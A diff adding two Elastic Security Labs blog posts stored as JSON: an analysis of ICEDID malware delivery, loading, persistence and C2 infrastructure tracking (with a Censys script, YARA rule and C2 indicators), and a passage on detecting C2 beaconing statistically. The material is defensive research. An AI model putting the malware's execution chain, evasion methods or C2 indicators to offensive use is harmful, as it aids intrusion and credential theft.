Initial access is typically gained through phishing campaigns leveraging malicious documents or file attachments.\n\nWe’ll be discussing aspects of ICEDID in the next couple of sections as well as exploring our analysis technique in tracking ICEDID infrastructure.\n\n- Initial access\n- Command and control\n- Persistence\n- Core functionality\n- Network infrastructure\n\n> As mentioned in the Preamble, ICEDID has been around for many years and has a rich feature set. As the malware has been analyzed multiple times over the years, we are going to focus on some of the more interesting features.\n\n## Initial access\n\nICEDID infections come in many different forms and have been adjusted using different techniques and novel execution chains to avoid detection and evade antimalware products. In this sample, ICEDID was delivered through a phishing email. The email contains a ZIP archive with an embedded ISO file. Inside the ISO file is a Windows shortcut (LNK) that, when double-clicked, executes the first stage ICEDID loader (DLL file).\n\n\n\nThe Windows shortcut target value is configured to execute **%windir%\\system32\\rundll32.exe olasius.dll,PluginInit** calling the **PluginInit** export, which starts the initial stage of the ICEDID infection. This stage is responsible for decrypting the embedded configuration, downloading a GZIP payload from a C2 server, writing an encrypted payload to disk ( **license.dat** ), and transferring execution to the next stage.\n\n\n\nThe first ICEDID stage starts off by deciphering an encrypted configuration blob of data stored within the DLL that is used to hold C2 domains and the campaign identifier. The first 32 bytes represent the XOR key; the encrypted data is then deciphered with this key.\n\n\n\n## Command and control\n\nICEDID constructs the initial HTTP request using cookie parameters that contain hexadecimal data from the infected machine used for fingerprinting the victim machine. 
This request will proceed to download the GZIP payload irrespective of any previous identifying information.\n\neSentire has [published research](https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-gootloader-and-icedid) that describes in detail how the gads, gat, ga, u, and io cookie parameters are created.\n\n\n\nBelow are the cookie parameters and example associated values behind them.\n\n| Parameter | Example Data | Note |\n| --------- | -------------------------------------------------------------------------------------------- | --------------------------------------------------------------------- |\n| \\_\\_gads | 3000901376:1:16212:134 | Contains campaign ID, flag, GetTickCount, number of running processes |\n| \\_\\_gat | 10.0.19044.64 | OS version, architecture |\n| \\_\\_ga | 1.591594.1635208534.76 | Hypervisor/processor information from CPUID/SwitchToThread function |\n| \\_\\_u | 4445534B544F502D4A4B4738455432:6A6F656C2E68656E646572736F6E:33413945354637303742414339393534 | Stores computer name, username, and bot ID |\n| \\_\\_io | 21_3990468985_3832573211_2062024380 | Security Identifier (SID) |\n| \\_\\_gid | 006869A80704 | Encrypted MAC address |\n\nThe downloaded GZIP payload contains a custom structure with a second loader ( **hollow.dat** ) and the encrypted ICEDID core payload ( **license.dat** ). These two files are written to disk and are used in combination to execute the core payload in memory.\n\n\n\nThe next phase highlights a unique element with ICEDID in how it loads the core payload ( **license.dat** ) by using a custom header structure instead of the traditional PE header. Memory is allocated with the sections of the next payload looped over and placed into their own virtual memory space. 
This approach has been well [documented](https://www.malwarebytes.com/blog/news/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads) and serves as a technique to obstruct analysis.\n\n\n\nEach section has its memory protection modified by the **VirtualProtect** function to enable read-only or read/write access to the committed region of memory using the **PAGE_READWRITE** constant.\n\n\n\nOnce the image entry point is set up, the ICEDID core payload is then loaded by a call to the [rax x86 register](https://www.cs.uaf.edu/2017/fall/cs301/lecture/09_11_registers.html#:~:text=rax%20is%20the%2064%2Dbit,processors%20with%20the%2080386%20CPU.).\n\n\n\n## Persistence\n\nICEDID will attempt to set up persistence first using a scheduled task, if that fails it will instead create a Windows Registry run key. Using the Bot ID and **RDTSC** instruction, a scheduled task or run key name is randomly generated. A scheduled task is created using **taskschd.dll** , configured to run at logon for the user, and is triggered every 1 hour indefinitely.\n\n\n\n## Core functionality\n\nThe core functionality of the ICEDID malware has been well documented and largely unchanged. 
To learn more about the core payload and functionality, check out the [Malpedia page](https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid) that includes a corpus of completed research on ICEDID.\n\nThat said, we counted 23 modules during the time of our analysis including:\n\n- MitM proxy for stealing credentials\n- Backconnect module\n- Command execution (PowerShell, cmd)\n- Shellcode injection\n- Collect\n - Registry key data\n - Running processes\n - Credentials\n - Browser cookies\n - System information (network, anti-virus, host enumeration)\n- Search and read files\n- Directory/file listing on user’s Desktop\n\n## ICEDID configuration extractor\n\nElastic Security Labs has released an open source tool, under the Apache 2.0 license, that will allow for configurations to be extracted from ICEDID samples. The tool can be downloaded [here](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt95ce19ae8cffda29/6351abcf20f42038fb989fae/icedid-config-extractor.tar.gz).\n\n\n\n## TLS certificate pinning\n\nPrevious [research](https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/) into the ICEDID malware family has highlighted a repetitive way in how the campaigns create their self-signed TLS certificates. Of particular note, this technique for creating TLS certificates has not been updated in approximately 18 months. While speculative in nature, this could be reflective of the fact that this C2 infrastructure is not widely tracked by threat data providers. This allows ICEDID to focus on updating the more transient elements of their campaigns (file hashes, C2 domains, and IP addresses).\n\nThe team at Check Point published in-depth and articulate research on tracking ICEDID infrastructure using ICEDID’s TLS certificate pinning feature. 
Additionally, Check Point [released a script](https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/#Appendix-A:~:text=147.228.198%0A91%5B.%5D193.19.251-,Appendix%20A,-Testing%20a%20server) that takes an IP address and port, and validates the suspect TLS serial number against a value calculated by the ICEDID malware to confirm whether or not the IP address is currently using an ICEDID TLS certificate.\n\nWe are including a wrapper that combines internet scanning data from Censys, and ICEDID C2 infrastructure conviction from the Check Point script. It can be downloaded [here](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb86bffd1aef20c5b/6351aba34e565f1cdce29da5/icedid-checker.tar.gz).\n\n### Dataset\n\nAs reported by Check Point, the TLS certificate information uses the same Issuer and Subject distinguished names to validate the C2 server before sending any data.\n\n\n\nTo build our dataset, we used the [Censys CLI tool](https://censys-python.readthedocs.io/en/stable/quick-start.html) to collect the certificate data. 
We needed to make a slight adjustment to the query from Check Point research, but the results were similar.\n\n```\ncensys search 'services.tls.certificates.leaf_data.subject_dn:\"CN=localhost, C=AU, ST=Some-State, O=Internet Widgits Pty Ltd\" and services.tls.certificates.leaf_data.issuer_dn:\"CN=localhost, C=AU, ST=Some-State, O=Internet Widgits Pty Ltd\" and services.port=443'\n\n[\n {\n \"ip\": \"103.208.85.237\",\n \"services\": [\n {\n \"port\": 22,\n \"service_name\": \"SSH\",\n \"transport_protocol\": \"TCP\"\n },\n {\n \"port\": 80,\n \"service_name\": \"HTTP\",\n \"transport_protocol\": \"TCP\"\n },\n {\n \"port\": 443,\n \"service_name\": \"HTTP\",\n \"certificate\": \"c5e7d92ba63be7fb2c44caa92458beef7047d7f987aaab3bdc41161b84ea2850\",\n \"transport_protocol\": \"TCP\"\n }\n ],\n \"location\": {\n \"continent\": \"Oceania\",\n \"country\": \"New Zealand\",\n \"country_code\": \"NZ\",\n\n…truncated…\n```\n\nThis provided us with 113 IP addresses that were using certificates we could begin to attribute to ICEDID campaigns.\n\n### JARM / JA3S\n\nWhen looking at the data from Censys, we also identified other fields that are useful in tracking TLS communications: [JARM](https://github.com/salesforce/jarm) and [JA3S](https://github.com/salesforce/ja3), both TLS fingerprinting tools from the Salesforce team.\n\nAt a high-level, JARM fingerprints TLS servers by _actively_ collecting specific elements of the TLS Server Hello responses. JA3S _passively_ collects values from the TLS Server Hello message. JARM and JA3S are represented as a 62-character or 32-character fingerprint, respectively.\n\n\n\nJARM and JA3S add additional data points that improve our confidence in connecting the ICEDID C2 infrastructure. 
In our research, we identified **2ad2ad16d2ad2ad22c2ad2ad2ad2adc110bab2c0a19e5d4e587c17ce497b15** as the JARM and **e35df3e00ca4ef31d42b34bebaa2f86e** as the JA3S fingerprints.\n\n> It should be noted that JARM and JA3S fingerprints are frequently too common to convict a host by themselves. As an example, in the Censys dataset, the JARM fingerprint identified over 15k hosts, and the JA3S fingerprint identified over 3.3M hosts. Looking at the JARM and JA3S values together still yielded approximately 8k hosts. These are data points on the journey to an answer, not the answer itself.\n\n### ICEDID implant defense\n\nBefore ICEDID communicates with its C2 server, it performs a TLS certificate check by comparing the certificate serial number with a hash of the certificate's public key. As certificate serial numbers should all be unique, ICEDID uses a self-signed certificate and an expected certificate serial number as a way to validate the TLS certificate. If the hash of the public key and serial number do not match, the communication with the C2 server does not proceed.\n\n\n\nWe used the Check Point Python script (which returns a **true** or **false** result for each passed IP address) to perform an additional check to improve our confidence that the IP addresses were part of the ICEDID C2 infrastructure and not simply a coincidence in having the same subject and issuer information as the ICEDID TLS certificates. A **true** result has a matching ICEDID fingerprint and a **false** result does not. 
This resulted in 103 IPs that were confirmed as having an ICEDID TLS certificate and 10 that did not (as of October 14, 2022).\n\n\n\n### Importing into Elasticsearch\n\nNow that we have a way to collect IPs based on the TLS certificate elements and a way to add additional context to aid in conviction; we can wrap the logic in a Bash script as a way to automate this process and parse the data for analysis in Elasticsearch.\n\n```\n#!/bin/bash -eu\n\nset -o pipefail\n\nSEARCH='services.tls.certificates.leaf_data.subject_dn:\"CN=localhost, C=AU, ST=Some-State, O=Internet Widgits Pty Ltd\" and services.tls.certificates.leaf_data.issuer_dn:\"CN=localhost, C=AU, ST=Some-State, O=Internet Widgits Pty Ltd\" and services.port=443'\n\nwhile read -r line; do\n _ts=$(date -u +%FT%TZ)\n _ip=$(echo ${line} | base64 -d | jq '.ip' -r)\n _port=$(echo ${line} | base64 -d | jq '.port' -r)\n _view=$(censys view \"${_ip}\" | jq -c)\n _is_icedid=$(python3 -c \"import icedid_checker; print(icedid_checker.test_is_icedid_c2('${_ip}','${_port}'))\")\n\n echo \"${_view}\" | jq -S --arg is_icedid \"${_is_icedid}\" --arg timestamp \"${_ts}\" '. + {\"@timestamp\": $timestamp, \"threat\": {\"software\": {\"icedid\": {\"present\": $is_icedid}}}}'\ndone < <(censys search --pages=-1 \"${SEARCH}\" | jq '.[] | {\"ip\": .ip, \"port\": (.services[] | select(.certificate?).port)} | @base64' -r) | tee icedid_infrastructure.ndjson\n```\n\nThis outputs the data as an NDJSON document called **icedid_infrastructure.ndjson** that we can upload into Elasticsearch.\n\n\n\nIn the above image, we can see that there are hosts that have the identified JARM fingerprint, the identified TLS issuer and subject elements, but did not pass the Check Point validation check. Additionally, one of the two hosts has a different JA3S fingerprint. 
This highlights the value of the combination of multiple data sources to inform confidence scoring.\n\nWe are also [providing this script](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb86bffd1aef20c5b/6351aba34e565f1cdce29da5/icedid-checker.tar.gz) for others to use.\n\n## Observed adversary tactics and techniques\n\nElastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.\n\nAs stated above, ICEDID has been extensively analyzed, so below we are listing the tactics and techniques that we observed and are covered in this research publication. If you’re interested in the full set of MITRE ATT&CK tactics and techniques, you can check out MITRE’s [page](https://attack.mitre.org/software/S0483/) on ICEDID.\n\n### Tactics\n\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n- [Discovery](https://attack.mitre.org/tactics/TA0007/)\n- [Execution](https://attack.mitre.org/tactics/TA0002)\n- [Persistence](https://attack.mitre.org/tactics/TA0003)\n- [Defense evasion](https://attack.mitre.org/tactics/TA0005)\n- [Reconnaissance](https://attack.mitre.org/tactics/TA0043)\n- [Resource development](https://attack.mitre.org/tactics/TA0042)\n- [Initial access](https://attack.mitre.org/tactics/TA0001)\n- [Command and control](https://attack.mitre.org/tactics/TA0011)\n- [Privilege Escalation](https://attack.mitre.org/tactics/TA0004)\n\n### Techniques / Sub techniques\n\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\n\n- [Permission Groups Discovery](https://attack.mitre.org/techniques/T1069/)\n- [Account Discovery](https://attack.mitre.org/techniques/T1087/)\n- [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059/)\n- [Software Discovery](https://attack.mitre.org/techniques/T1518/)\n- [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218/)\n- [Remote System Discovery](https://attack.mitre.org/techniques/T1018/)\n- [Network Share Discovery](https://attack.mitre.org/techniques/T1135/)\n- [Phishing: Spearphishing attachment](https://attack.mitre.org/techniques/T1566/001)\n- [Scheduled Task/Job: Scheduled Task](https://attack.mitre.org/techniques/T1053/005/)\n- [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/)\n- [Process Injection](https://attack.mitre.org/techniques/T1055/)\n\n## Detections and preventions\n\n### Detection logic\n\n- [Enumeration of Administrator Accounts](https://www.elastic.co/guide/en/security/current/enumeration-of-administrator-accounts.html)\n- [Command Shell Activity Started via RunDLL32](https://www.elastic.co/guide/en/security/current/command-shell-activity-started-via-rundll32.html)\n- [Security Software Discovery using WMIC](https://www.elastic.co/guide/en/security/current/security-software-discovery-using-wmic.html)\n- [Suspicious Execution from a Mounted Device](https://www.elastic.co/guide/en/security/current/suspicious-execution-from-a-mounted-device.html)\n- [Windows Network Enumeration](https://www.elastic.co/guide/en/security/current/windows-network-enumeration.html)\n\n### Preventions\n\n- Malicious Behavior Detection Alert: Command Shell Activity\n- Memory Threat Detection Alert: Shellcode Injection\n- Malicious Behavior Detection Alert: Unusual DLL Extension Loaded by Rundll32 or Regsvr32\n- Malicious Behavior Detection Alert: Suspicious Windows Script Interpreter Child Process\n- Malicious Behavior Detection Alert: RunDLL32 with Unusual Arguments\n- Malicious Behavior Detection Alert: Windows Script Execution from Archive File\n\n### YARA\n\nElastic Security has created [YARA rules](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_IcedID.yar) to identify this activity. 
Below is a YARA rule specifically to identify the TLS certificate pinning function used by ICEDID.\n\n```\nrule Windows_Trojan_IcedID_cert_pinning {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2022-10-17\"\n last_modified = \"2022-10-17\"\n threat_name = \"Windows.Trojan.IcedID\"\n arch_context = \"x86\"\n license = \"Elastic License v2\"\n os = \"windows\"\n strings:\n\t\t$cert_pinning = { 74 ?? 8B 50 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 0F BA F0 ?? 48 8B 51 ?? 48 8B 4A ?? 39 01 74 ?? 35 14 24 4A 38 39 01 74 ?? }\n condition:\n $cert_pinning\n}\n```\n\n## References\n\nThe following were referenced throughout the above research:\n\n- [https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid](https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid)\n- [https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/](https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/)\n- [https://attack.mitre.org/software/S0483/](https://attack.mitre.org/software/S0483/)\n\n## Indicators\n\nThe indicators observed in this research are posted below. All artifacts (to include those discovered through TLS certificate pinning) are also [available for download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc090b3574bb4e7be/633615e4a920fd42f67e7534/ref2731-indicators.zip) in both ECS and STIX format in a combined zip bundle.\n\n| Indicator | Type | Note |\n| ---------------------------------------------------------------- | --------- | -------------------- |\n| db91742b64c866df2fc7445a4879ec5fc256319e234b1ac5a25589455b2d9e32 | SHA256 | ICEDID malware |\n| yolneanz[.]com | domain | ICEDID C2 domain |\n| 51.89.190[.]220 | ipv4-addr | ICEDID C2 IP address |\n"
+ },
+ "title": "ICEDIDs network infrastructure is alive and well",
+ "slug": "icedids-network-infrastructure-is-alive-and-well",
+ "date": "2022-10-31",
+ "description": "Elastic Security Labs details the use of open source data collection and the Elastic Stack to analyze the ICEDID botnet C2 infrastructure.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "derek-ditch"
+ },
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "blog-banner-network-graph-dots.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ }
+ ],
+ "tags": [
+ "malware",
+ "icedid",
+ "ref1021",
+ "bokbot"
+ ]
+ },
+ "id": "security_labs_content-icedids_network_infrastructure_is_alive_and_well-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-identifying_beaconing_malware_using_elastic-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-identifying_beaconing_malware_using_elastic-md.json
new file mode 100644
index 00000000000..a3e078de887
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-identifying_beaconing_malware_using_elastic-md.json
@@ -0,0 +1,33 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Identifying beaconing malware using Elastic\"\nslug: \"identifying-beaconing-malware-using-elastic\"\ndate: \"2023-03-01\"\ndescription: \"In this blog, we walk users through identifying beaconing malware in their environment using our beaconing identification framework.\"\nauthor:\n - slug: apoorva-joshi\n - slug: thomas-veasey\n - slug: craig-chamberlain\nimage: \"blog-thumbnail-securitymaze.jpg\"\ncategory:\n - slug: machine-learning\n - slug: detection-science\n---\n\nThe early stages of an intrusion usually include initial access, execution, persistence, and command-and-control (C2) beaconing. When structured threats use zero-days, these first two stages are often not detected. It can often be challenging and time-consuming to identify persistence mechanisms left by an advanced adversary, as we saw in the [2020 SUNBURST supply chain compromise](https://www.elastic.co/blog/elastic-security-provides-free-and-open-protections-for-sunburst). Could we then have detected SUNBURST in the initial hours or days by finding its C2 beacon?\n\nThe potential for beaconing detection is that it can serve as an early warning system and help discover novel persistence mechanisms in the initial hours or days after execution. This allows defenders to disrupt or evict the threat actor before they can achieve their objectives. So, while we are not quite \"left of boom\" by detecting C2 beaconing, we can make a big difference in the outcome of the attack by reducing its overall impact.\n\nIn this blog, we talk about a beaconing identification framework that we built using Painless and aggregations in the Elastic Stack. The framework can not only help threat hunters and analysts monitor network traffic for beaconing activity, but also provide useful indicators of compromise (IoCs) for them to start an investigation with. 
If you don’t have an Elastic Cloud cluster but would like to try out our beaconing identification framework, you can start a [free 14-day trial](https://cloud.elastic.co/registration) of Elastic Cloud.\n\n## **Beaconing — A primer**\n\nAn enterprise's defense is only as good as its firewalls, antivirus, endpoint detection and intrusion detection capabilities, and SOC (Security Operations Center) — which consists of analysts, engineers, operators, administrators, etc., who work round the clock to keep the organization secure. Malware, however, enters enterprises in many different ways and uses a variety of techniques to go undetected. An increasingly common method used by adversaries nowadays to evade detection is to use C2 beaconing as a part of their attack chain, given that it allows them to blend into networks like a normal user.\n\nIn networking, beaconing is a term used to describe a continuous cadence of communication between two systems. In the context of malware, beaconing is when malware periodically calls out to the attacker's C2 server to get further instructions on tasks to perform on the victim machine. The frequency at which the malware checks in and the methods used for the communications are configured by the attacker. Some of the common protocols used for C2 are HTTP/S, DNS, SSH, and SMTP, as well as common cloud services like Google, Twitter, Dropbox, etc. Using common protocols and services for C2 allows adversaries to masquerade as normal network traffic and hence evade firewalls.\n\nWhile on the surface beaconing can appear similar to normal network traffic, it has some unique traits with respect to timing and packet size, which can be modeled using standard statistical and signal processing techniques.\n\nBelow is an example of a Koadic C2 beacon, which serves the malicious payload using the DLL host process. 
As you can see, the payload beacons consistently at an interval of 10 minutes, and the source, as well as destination packet sizes, are almost identical.\n\n\n\nIt might seem like a trivial task to catch C2 beaconing if all beacons were as neatly structured and predictable as the above. All one would have to look for is periodicity and consistency in packet sizes. However, malware these days is not as straightforward.\n\n\n\nMost sophisticated malware nowadays adds a \"jitter\" or randomness to the beacon interval, making the signal more difficult to detect. Some malware authors also use longer beacon intervals. The beaconing identification framework we propose accounts for some of these elusive modifications to traditional beaconing behavior.\n\n## **Our approach**\n\nWe’ve discussed a bit about the why and what — in this section we dig deeper into how we identify beaconing traffic. Before we begin, it is important to note that beaconing is merely a communication characteristic. It is neither good nor evil by definition. While it is true that malware heavily relies on beaconing nowadays, a lot of legitimate software also exhibits beaconing behaviour.\n\nWhile we have made efforts to reduce false positives, this framework should be looked at as a means for beaconing identification to help reduce the search space for a threat hunt, not as a means for detection. That said, indicators produced by this framework, when combined with other IoCs, can potentially be used to detect on malicious activity.\n\nThe beacons we are interested in comprise traffic from a single running process on a particular host machine to one or more external IPs. 
Given that the malware can have both short (order of seconds) and long (order of hours or days) check-in intervals, we will restrict our attention to a time window that works reasonably for both and attempt to answer the question: “What is beaconing in my environment right now or recently?” We have also parameterized the inputs to the framework to allow users to configure important settings like time window, etc. More on this in upcoming sections.\n\nWhen dealing with large data sets, such as network data for an enterprise, you need to think carefully about what you can measure, which allows you to scale effectively. Scaling has several facets, but for our purposes, we have the following requirements:\n\n1. Work can be parallelised over different shards of data stored on different machines\n2. The amount of data that needs to move around to compute what is needed must be kept manageable.\n\nMultiple approaches have been suggested for detecting beaconing characteristics, but not all of them satisfy these constraints. For example, a popular choice for detecting beacon timing characteristics is to measure the interval between events. This proves to be too inefficient to use on large datasets because the events can't be processed across multiple shards.\n\nDriven by the need to scale, we chose to detect beaconing by bucketing the data in the time window to be analyzed. We gather the event count and average bytes sent and received in each bucket. These statistics can be computed in MapReduce fashion and values from different shards can be combined at the coordinating node of an Elasticsearch query.\n\nFurthermore, by controlling the ratio between the bucket and window lengths, the data we pass per running process has predictable memory consumption, which is important for system stability. The whole process is illustrated diagrammatically below:\n\n\n\nA key attribute of beaconing traffic is it often has similar netflow bytes for the majority of its communication. 
If we average the bytes over all the events that fall in a single bucket, the average for different buckets will in fact be even more similar. This is just the law of large numbers in action. A good way to measure similarity of several positive numbers (in our case these are average bucket netflow bytes) is using a statistic called the [coefficient of variation](https://en.wikipedia.org/wiki/Coefficient_of_variation) (COV). This captures the average relative difference between the values and their mean. Because this is a relative value, a COV closer to 0 implies that values are tightly clustered around their mean.\n\nWe also found that occasional spikes in the netflow bytes in some beacons were inflating the COV statistic. In order to rectify this, we simply discarded low and high percentile values when computing the COV, which is a standard technique for creating a robust statistic. We threshold the value of this statistic to be significantly less than one to detect this characteristic of beacons.\n\nFor periodicity, we observed that signals displayed one of two characteristics when we viewed the bucket counts. If the period was less than the time bucket length (i.e. high frequency beacons), then the count showed little variation from bucket to bucket. If the period was longer than the time bucket length (i.e. low frequency beacons), then the signal had high autocorrelation. Let's discuss these in detail.\n\nTo test for high frequency beacons, we use a statistic called [relative variance](https://en.wikipedia.org/wiki/Index_of_dispersion) (RV). The rates of many naturally occurring phenomena are well described by a [Poisson distribution](https://en.wikipedia.org/wiki/Poisson_distribution#Occurrence_and_applications). 
The reason for this is that if events arrive randomly at a constant average rate and the occurrence of one event doesn’t affect the chance of others occurring, then their count in a fixed time interval must be Poisson distributed.\n\nJust to underline this point, it doesn’t matter what the underlying mechanisms for that random delay between events are (making a coffee, waiting for your software to build, etc.)— if those properties hold, the rate distribution is always the same. Therefore, we expect the bucket counts to be Poisson distributed for much of the traffic in our network, but not for beacons, which are much more regular. A feature of the Poisson distribution is that its variance is equal to its average, i.e. its RV is 1. Loosely, this means that if the RV of our bucket counts is closer to 0, the signal is more regular than a Poisson process.\n\n[Autocorrelation](https://en.wikipedia.org/wiki/Autocorrelation) is a useful statistic for understanding when a time series repeats itself. The basic idea behind autocorrelation is to compare the time series values to themselves after shifting them in time. Specifically, it is the covariance between the two sets of values (which is larger when they are more similar), normalized by dividing it by the square root of the variances of the two sets, which measures how much the values vary among themselves.\n\nThis process is illustrated schematically below. We apply this to the time series comprising the bucket counts: if the signal is periodic then the time bucketed counts must also repeat themselves. The nice thing about autocorrelation from our perspective is that it is capable of detecting any periodic pattern. 
For example, the events don’t need to be regularly spaced but might repeat like two events occurring close to one another in time, followed by a long gap and so on.\n\n\n\nWe don’t know the shift beforehand that will maximize the similarity between the two sets of values, so we search over all shifts for the maximum. This, in effect, is the period of the data — the closer its autocorrelation is to one, the closer the time series is to being truly periodic. We threshold the autocorrelation close to one to test for low frequency beacons.\n\nFinally, we noted that most beaconing malware these days incorporates jitter. How does autocorrelation deal with this? Well first off, autocorrelation isn’t a binary measure — it is a sliding scale: the closer the value is to 1 the more similar the two sets of values are to one another. Even if they are not identical but similar it can still be close to one. In fact, we can do better than this by modelling how random jitter affects autocorrelation and undoing its effect. Provided the jitter isn’t too large, the process to do this turns out to be about as complex as just finding the maximum autocorrelation.\n\nIn our implementation, we’ve made the percentage configurable, although one would always use a small-ish percentage to avoid flagging too much traffic as periodic. If you'd like to dig into the gory details of our implementation, all the artifacts are available as a GitHub [release](https://github.com/elastic/detection-rules/releases/tag/ML-Beaconing-20211216-1) in our detection rules repository.\n\n## **How do we do this using Elasticsearch?**\n\nElasticsearch has some very powerful tools for ad hoc data analysis. The [scripted metric aggregation](https://www.elastic.co/guide/en/elasticsearch/reference/current/search-aggregations-metrics-scripted-metric-aggregation.html) is one of them. The nice thing about this aggregation is that it allows you to write custom Painless scripts to derive different metrics about your data. 
We used the aggregation to script out the beaconing tests.\n\nIn a typical environment, the cardinality of the distinct processes running across endpoints is rather high. Trying to run an aggregation that partitions by every running process is therefore not feasible. This is where another feature of the Elastic Stack comes in handy. A [transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is a complex aggregation which paginates through all your data and writes results to a destination index.\n\nThere are various basic operations available in transforms, one of them being partitioning data at scale. In our case, we partitioned our network event logs by host and process name and ran our scripted metric aggregation against each host-process name pair. The transform also writes out various beaconing related indicators and statistics. A sample document from the resulting destination index is as follows:\n\n\n\nAs you can see, the document contains valuable beaconing-related information about the process. First off, the beacon_stats.is_beaconing indicator says whether or not we found the process to be beaconing. If it is, as in the case above, the document will also contain important metadata, such as the frequency of the beacon. The indicator beacon_stats.periodic says whether or not the signal is a low-frequency beacon, while the indicator beacon_stats.low_count_variation indicates whether or not it is a high-frequency beacon.\n\nFurthermore, the indicators beacon_stats.low_source_bytes_variation and low_destination_bytes_variation indicate whether or not the source and destination bytes sent during the beaconing communication were more or less uniform. 
Finally, you will also notice the beaconing_score indicator, which is a value from 1-3, representing the number of beaconing tests satisfied by the process for that time period.\n\nWriting such metadata out to an index also means that you can search for different facets of beaconing software in your environment. For example, if you want to search for low frequency beaconing processes in your environment, you would query for documents where the beacon_stats.periodic indicator is true and beacon_stats.low_count_variation is false. You can also build second order analytics on top of the indexed data, such as using [anomaly detection](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html) to find rare beaconing processes, or using a [significant terms aggregation](https://www.elastic.co/guide/en/elasticsearch/reference/current/search-aggregations-bucket-significantterms-aggregation.html) to detect lateral movement of beaconing malware in your environment.\n\nFinally, we’ve included several dashboards for your threat hunters and analysts to use for monitoring beaconing activity in your environment. These can be found in the [release package](https://github.com/elastic/detection-rules/releases/tag/ML-Beaconing-20211216-1) as well.\n\n## **Tuning parameters and filtering**\n\nAdvanced users can also tune important parameters to the scripted metric aggregation in the transforms, like jitter percentage, time window, etc. If you'd like to change the default parameters, all you would need to do is delete the transform, change the parameters, and restart it. The parameters you can tune are as follows:\n\n- number_buckets_in_range: The number of time buckets we split the time window into. You need enough to ensure you get reasonable estimates for the various statistics, but too many means the transform will use more memory and compute.\n- time_bucket_length: The length of each time bucket. 
This controls the time window, so the larger this value the longer the time window. You might set this longer if you want to check for very low frequency beacons.\n- number_destination_ips: The number of destination IPs to gather in the results. Setting this higher increases the transform resource usage.\n- max_beaconing_bytes_cov: The maximum coefficient of variation in the payload bytes for the low source and destination bytes variance test. Setting this higher will increase the chance of detecting traffic as beaconing, so would likely increase [recall](https://en.wikipedia.org/wiki/Precision_and_recall) for malicious C2 beacons. However, it will also reduce the [precision](https://en.wikipedia.org/wiki/Precision_and_recall) of the test.\n- max_beaconing_count_rv: The maximum relative variance in the bucket counts for the high frequency beacon test. As with max_beaconing_bytes_cov, we suggest tuning this parameter based on the kind of tradeoff you want between precision and recall.\n- truncate_at: The lower and upper fraction of bucket values discarded when computing max_beaconing_bytes_cov and max_beaconing_count_rv. This allows you to ignore occasional changes in traffic patterns. However, if you retain too small a fraction of the data, these tests will be unreliable.\n- min_beaconing_count_autocovariance: The minimum autocorrelation of the signal for the low frequency beacon test. Lowering this value will likely result in an increase in recall for malicious C2 beacons, at the cost of reduced test precision. As with some of the other parameters mentioned above, we suggest tuning this parameter based on the kind of tradeoff you want between precision and recall.\n- max_jitter: The maximum amount by which we assume that a periodic beacon is jittered, as a fraction of its period.\n\nYou can also make changes to the transform query. We currently look for beaconing activity over a 6h time range, but you can change this to a different time range. 
As mentioned previously, beaconing is not a characteristic specific to malware and a lot of legitimate, benign processes also exhibit beaconing-like activity.\n\nIn order to curb the false positive rate, we have included a starter list of filters in the transform query to exclude known benign beaconing processes that we observed during testing, and a list of IPs that fall into two categories:\n\n1. The source IP is local and the destination is remote\n2. For certain Microsoft processes, the destination IP is in a Microsoft block\n\nYou can add to this list based on what you see in your environment.\n\n## **Evaluation**\n\nIn order to measure the effectiveness of our framework as a reduced search space for beaconing activity, we wanted to test two aspects:\n\n1. Does the framework flag actual malicious beaconing activity?\n2. By how much does the framework reduce the search space for malicious beacons?\n\nIn order to test the performance on malware beacons, we ran the transform on some synthetic data as well as some real malware! We set up test ranges for Emotet and Koadic, and also tested it on NOBELIUM logs we had from several months ago. The results from the real malware tests are worth mentioning here.\n\n\n\nFor NOBELIUM, the beaconing transform catches the offending process, rundll32.exe, as well as the two destination IPs, 192.99.221.77 and 83.171.237.173, which were among the main IoCs for NOBELIUM.\n\nFor Koadic and Emotet as well, the transform was able to flag the process as well as the known destination IPs on which the test C2 listeners were running. The characteristics of each of the beacons were different. For example, Koadic was a straightforward, high-frequency beacon that satisfied all the beaconing criteria being checked in the transform i.e. periodicity, as well as low variation of source and destination bytes. Emotet was slightly trickier since it was a low frequency beacon with a high jitter percentage. 
